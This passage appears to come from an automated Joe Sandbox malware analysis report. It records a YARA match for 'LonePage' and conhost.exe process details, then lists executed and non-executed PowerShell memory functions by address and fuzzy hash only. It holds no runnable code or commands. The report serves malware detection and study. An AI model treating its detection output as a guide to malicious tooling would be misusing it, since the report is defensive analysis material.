                                                                              • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000020.00000002.3733520219.000001BD0015B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:33
                                                                              Start time:11:10:01
                                                                              Start date:30/09/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Function 00007FFAACA67028 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1347109032.00007FFAACA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaaca60000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: r6
                                                                                • API String ID: 0-2984296541
                                                                                • Opcode ID: 53d9e91069a6968380ce08f1f8e0ea2155a5d907e96f98993d082637c98906ec
                                                                                • Instruction ID: bf97fa07f2abf9b0b827dd8bdf8b716bcd4b00ef6ec68e0c247ca5c58f3092fa
                                                                                • Opcode Fuzzy Hash: 53d9e91069a6968380ce08f1f8e0ea2155a5d907e96f98993d082637c98906ec
                                                                                • Instruction Fuzzy Hash: 9801D673E2D919CFF2A5D71CB4069B8A3C3EF85220B5641B6E14DC3196ED19AC0542C1
                                                                                Function 00007FFAACA634B8 Relevance: .4, Instructions: 408COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1347109032.00007FFAACA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaaca60000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 618dd324eaff5713387e0f634694bdd086644f9f3a3c09b2b96270d176d5b73c
                                                                                • Instruction ID: d871a580a9e216cc8f7e07492de384977a9606e622ef35465dd2ed758f6deab1
                                                                                • Opcode Fuzzy Hash: 618dd324eaff5713387e0f634694bdd086644f9f3a3c09b2b96270d176d5b73c
                                                                                • Instruction Fuzzy Hash: 35C137B2A2FACA8FF755EB6C98145B5BBD1EF56320B0841BED04DC70D3EA14D8098391
                                                                                Function 00007FFAACA6091E Relevance: .4, Instructions: 394COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1347109032.00007FFAACA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaaca60000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5d4eb584ef5aca1c60c4e994326da561be966ef7f017ea38be6b754398e19921
                                                                                • Instruction ID: ad0448aefd36c6a2dfb705b763b523ed7403cece26ddd2117664fb017cc7549f
                                                                                • Opcode Fuzzy Hash: 5d4eb584ef5aca1c60c4e994326da561be966ef7f017ea38be6b754398e19921
                                                                                • Instruction Fuzzy Hash: 89C10172A2EBC98FF756977858255B5BFE2DF53250B0840FBD08EC7093E90898498385
                                                                                Function 00007FFAACA609EA Relevance: .1, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1347109032.00007FFAACA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaaca60000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 77b03e2c93a69f3d960cbf2ce4d7960c0f6879bb0ec72760d0d0ee15154f3584
                                                                                • Instruction ID: 469b4d8963f597bac4ddc3303ffb9fc0e3651caf1bb8d6ac7f845d4be5a5922a
                                                                                • Opcode Fuzzy Hash: 77b03e2c93a69f3d960cbf2ce4d7960c0f6879bb0ec72760d0d0ee15154f3584
                                                                                • Instruction Fuzzy Hash: 8731CB72B2FA8A4FF799977C146517899C2EF6269075940BFD44EC31D3EC08DC884385
                                                                                Function 00007FFAAC9937B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1345747926.00007FFAAC990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC990000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac990000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                • Instruction ID: a7be3800a2ef9775fe893b3c134c1af1bc1630d6202ff80819ba4b41132ab22a
                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                • Instruction Fuzzy Hash: EB01677115CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E882CB46

                                                                                Executed Functions

                                                                                Function 00007FFAAC6715F5 Relevance: 1.7, Strings: 1, Instructions: 467COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2367907913.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffaac670000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Ph;
                                                                                • API String ID: 0-3923975610
                                                                                • Opcode ID: 06817fc27273cd9076314ffb5f3a66bee939b8bd75421fb016459bd230faebfc
                                                                                • Instruction ID: dc361f08d2174404e50e190a6780deed1c7c27d1b729f3d266e7eb1ba8bf47b3
                                                                                • Opcode Fuzzy Hash: 06817fc27273cd9076314ffb5f3a66bee939b8bd75421fb016459bd230faebfc
                                                                                • Instruction Fuzzy Hash: 2EE1DF6290EBD68FF797D76848651B47FE2EF53210B1869FFD08DC71A3E90898098391
                                                                                Function 00007FFAAC673F95 Relevance: .5, Instructions: 501COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2367907913.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffaac670000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9dadd07ba5074838a485a54e42bb1fa9ea708c0f956ea000626631fb545f4a1b
                                                                                • Instruction ID: 7ad6b9da584816f74683f957adde9c249896b57e2fca25f7bdd357799d50b638
                                                                                • Opcode Fuzzy Hash: 9dadd07ba5074838a485a54e42bb1fa9ea708c0f956ea000626631fb545f4a1b
                                                                                • Instruction Fuzzy Hash: 8EE1226290EADA8FE753E77848595B57FE2EF53210B0855FAD08DCB0A3DD08D809C791
                                                                                Function 00007FFAAC673FBE Relevance: .3, Instructions: 347COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2367907913.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffaac670000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e31afd211904fc02b7df966a149a29c1e3fc8d42be887da1eba2e25ea8f4e207
                                                                                • Instruction ID: d046b144691fb2b843e13666e48d41880b48a9d256de14a3cf11fe09ae296da2
                                                                                • Opcode Fuzzy Hash: e31afd211904fc02b7df966a149a29c1e3fc8d42be887da1eba2e25ea8f4e207
                                                                                • Instruction Fuzzy Hash: 8DB1DE6190F7D28FE793D77848695B47FE29F53210B1995FAD08CCB0A3D909980AC792
                                                                                Function 00007FFAAC6716CA Relevance: .1, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2367907913.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffaac670000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8ef866265f037712d1a129cb2c3baae0a6131ad1f9074b0727ebb30bade1e849
                                                                                • Instruction ID: 66ba9bcf509e417179b3124fddcfaec0bce7ed6757adbb705da6619612864d79
                                                                                • Opcode Fuzzy Hash: 8ef866265f037712d1a129cb2c3baae0a6131ad1f9074b0727ebb30bade1e849
                                                                                • Instruction Fuzzy Hash: FC41F562D1FA978BF797D76808551B46AC3EF92650B58B8BFD44EC31D2ED0CDC088281
                                                                                Function 00007FFAAC5A3B45 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2367341629.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffaac5a0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 33ed0b602c640223d4ed0522fa5e62f436132279d681f04a73f7744d7fdd53f4
                                                                                • Instruction ID: b27971bd1d8b7ced9bf8b60ce15ae14e9dc876fe7abce8a83431b15e6c43de65
                                                                                • Opcode Fuzzy Hash: 33ed0b602c640223d4ed0522fa5e62f436132279d681f04a73f7744d7fdd53f4
                                                                                • Instruction Fuzzy Hash: 6F01677115CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661DA36E881CB45

                                                                                Non-executed Functions

                                                                                Function 00007FFAAC5A0EE0 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2367341629.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffaac5a0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "[_
                                                                                • API String ID: 0-2987219714
                                                                                • Opcode ID: 719d5ae54021a1b43710dd0f78b599831812054fed3e0290a8b5d6ab8f26a9e5
                                                                                • Instruction ID: 6267d96d4a37c68d384eb3c82e238b09ab8e1e8d381457ab96a3c3ba7379fc88
                                                                                • Opcode Fuzzy Hash: 719d5ae54021a1b43710dd0f78b599831812054fed3e0290a8b5d6ab8f26a9e5
                                                                                • Instruction Fuzzy Hash: D8B19193D4F7D3DBF353876A58A90D63F94EF53A5870940F7E4CA8B0939D14A80A82E1